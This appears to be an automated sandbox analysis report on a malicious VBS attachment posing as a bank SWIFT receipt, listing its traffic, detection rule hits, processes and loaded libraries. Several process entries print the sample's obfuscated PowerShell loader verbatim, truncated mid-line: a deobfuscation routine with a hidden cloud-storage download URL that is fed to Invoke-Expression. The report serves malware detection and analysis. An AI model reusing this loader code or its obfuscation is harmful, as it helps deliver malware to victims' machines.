Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49700 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_1132.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1132, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7584
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7584Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be j
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348985FA2_2_00007FFD348985FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348983522_2_00007FFD34898352
Source: e-dekont_swift-details.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_1132.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1132, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@6/4@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\kartotekskorts.VrdJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1wct10w.5d1.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: e-dekont_swift-details.vbsVirustotal: Detection: 11%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be j
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: e.pdb#K source: powershell.exe, 00000002.00000002.2193820727.0000017EB8F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb`T]e source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbion* 1TX]d source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbK source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
